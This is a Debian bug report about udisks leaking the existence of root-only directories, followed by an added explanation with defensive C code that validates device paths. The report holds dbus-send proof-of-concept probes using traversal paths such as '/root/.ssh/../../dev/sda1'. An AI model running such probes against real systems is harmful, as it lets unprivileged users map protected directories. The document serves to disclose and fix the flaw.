[Pkg-utopia-maintainers] Bug#698774: udisks leaks information about existence of directories

Timo Juhani Lindfors timo.lindfors at iki.fi
Wed Jan 23 13:09:35 UTC 2013


Package: udisks
Version: 1.0.1+git20100614-3
Severity: important
Tags: security

It seems that org.freedesktop.UDisks.FindDeviceByDeviceFile can be
used to discover whether a directory exists even if the user should
not have any access to it:

$ ls -ld /root/.ssh
ls: cannot access /root/.ssh: Permission denied
$ ls -ld /root/.foo
ls: cannot access /root/.foo: Permission denied

$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.ssh/../../dev/sda1"
method return sender=:1.28 -> dest=:1.3755 reply_serial=2
   object path "/org/freedesktop/UDisks/devices/sda1"

$ dbus-send --print-reply --system --dest=org.freedesktop.UDisks /org/freedesktop/UDisks org.freedesktop.UDisks.FindDeviceByDeviceFile string:"/root/.foo/../../dev/sda1"
Error org.freedesktop.UDisks.Error.Failed: No such device

This bug was inspired by bug #697464.


-- System Information:
Debian Release: 6.0.6
  APT prefers stable
  APT policy: (500, 'stable')
Architecture: amd64 (x86_64)

Kernel: Linux 3.2.0-0.bpo.2-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash

Versions of packages udisks depends on:
ii  dbus                  1.2.24-4+squeeze1  simple interprocess messaging syst
ii  libatasmart4          0.17+git20100219-2 ATA S.M.A.R.T. reading and parsing
ii  libc6                 2.11.3-4           Embedded GNU C Library: Shared lib
ii  libdbus-1-3           1.2.24-4+squeeze1  simple interprocess messaging syst
ii  libdbus-glib-1-2      0.88-2.1           simple interprocess messaging syst
ii  libdevmapper1.02.1    2:1.02.48-5        The Linux Kernel Device Mapper use
ii  libglib2.0-0          2.24.2-1           The GLib library of C routines
ii  libgudev-1.0-0        164-3              GObject-based wrapper library for 
ii  libparted0debian1     2.3-5              The GNU Parted disk partitioning s
ii  libpolkit-backend-1-0 0.96-4+squeeze2    PolicyKit backend API
ii  libpolkit-gobject-1-0 0.96-4+squeeze2    PolicyKit Authorization API
ii  libsgutils2-2         1.29-1             utilities for devices using the SC
ii  libudev0              164-3              libudev shared library
ii  udev                  164-3              /dev/ and hotplug management daemo

Versions of packages udisks recommends:
ii  dosfstools               3.0.9-1         utilities for making and checking 
ii  hdparm                   9.32-1          tune hard disk parameters for high
pn  mtools                   <none>          (no description available)
pn  ntfs-3g                  <none>          (no description available)
pn  ntfsprogs                <none>          (no description available)
ii  policykit-1              0.96-4+squeeze2 framework for managing administrat

Versions of packages udisks suggests:
ii  cryptsetup             2:1.1.3-4squeeze2 configures encrypted block devices
pn  mdadm                  <none>            (no description available)
pn  reiserfsprogs          <none>            (no description available)
pn  xfsprogs               <none>            (no description available)

-- no debconf information
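The leak in the report comes from the daemon resolving a caller-supplied path with root privileges and returning a different answer depending on whether the traversal through /root/.ssh succeeds. The defensive fix is to validate the argument lexically before anything on disk is touched, so that every path outside /dev, and every path containing "." or ".." components, gets the same rejection without a stat() or realpath() call. The following C code is an added example written for this page; it is not udisks source, and the function names device_path_is_safe and find_device_guarded are assumptions made here for illustration.

```c
/* Added example (not udisks code): reject device-file arguments that could
 * turn a privileged daemon's path resolution into a directory-existence
 * oracle. Validation is purely lexical: the name must be absolute, live under
 * /dev/, and contain only plain components, so nothing outside /dev is ever
 * looked up on the caller's behalf. */
#include <stdio.h>
#include <string.h>
#include <stdbool.h>
#include <sys/stat.h>

/* Return true if 'path' is an acceptable device file name. */
bool device_path_is_safe(const char *path)
{
    if (path == NULL || path[0] != '/')
        return false;                       /* must be absolute */
    if (strncmp(path, "/dev/", 5) != 0)
        return false;                       /* must start under /dev/ */

    const char *p = path;
    while (*p != '\0') {
        while (*p == '/')
            p++;                            /* skip one or more separators */
        if (*p == '\0')
            return false;                   /* trailing slash names a directory */
        const char *start = p;
        while (*p != '\0' && *p != '/')
            p++;
        size_t len = (size_t)(p - start);
        /* "." and ".." let the caller walk out of /dev; the reply to such a
         * path would then depend on directories the caller cannot read. */
        if ((len == 1 && start[0] == '.') ||
            (len == 2 && start[0] == '.' && start[1] == '.'))
            return false;
    }
    return true;
}

/* Outcome of a guarded lookup. LOOKUP_REJECTED is decided without touching
 * the filesystem, so it reveals nothing about paths outside /dev. */
enum lookup_result { LOOKUP_REJECTED, LOOKUP_NOT_A_DEVICE, LOOKUP_FOUND };

enum lookup_result find_device_guarded(const char *path)
{
    if (!device_path_is_safe(path))
        return LOOKUP_REJECTED;             /* identical answer for every bad path */

    struct stat st;
    if (lstat(path, &st) != 0 || !S_ISBLK(st.st_mode))
        return LOOKUP_NOT_A_DEVICE;         /* missing, or not a block device */
    return LOOKUP_FOUND;
}

int main(void)
{
    /* The two probes from the report: both must be rejected up front, so an
     * unprivileged caller learns nothing about /root/.ssh versus /root/.foo. */
    const char *probes[] = {
        "/root/.ssh/../../dev/sda1",
        "/root/.foo/../../dev/sda1",
        "/dev/../root/.ssh/../../dev/sda1",
        "/dev/sda1",
    };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++)
        printf("%-36s -> %s\n", probes[i],
               device_path_is_safe(probes[i]) ? "accepted" : "rejected");
    return 0;
}
```

The property that matters is that the two paths from the report produce the same result before any filesystem call is made; a name like /dev/disk/by-id/... still passes, since subdirectories of /dev are legitimate, while any "." or ".." component is refused regardless of where it appears.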
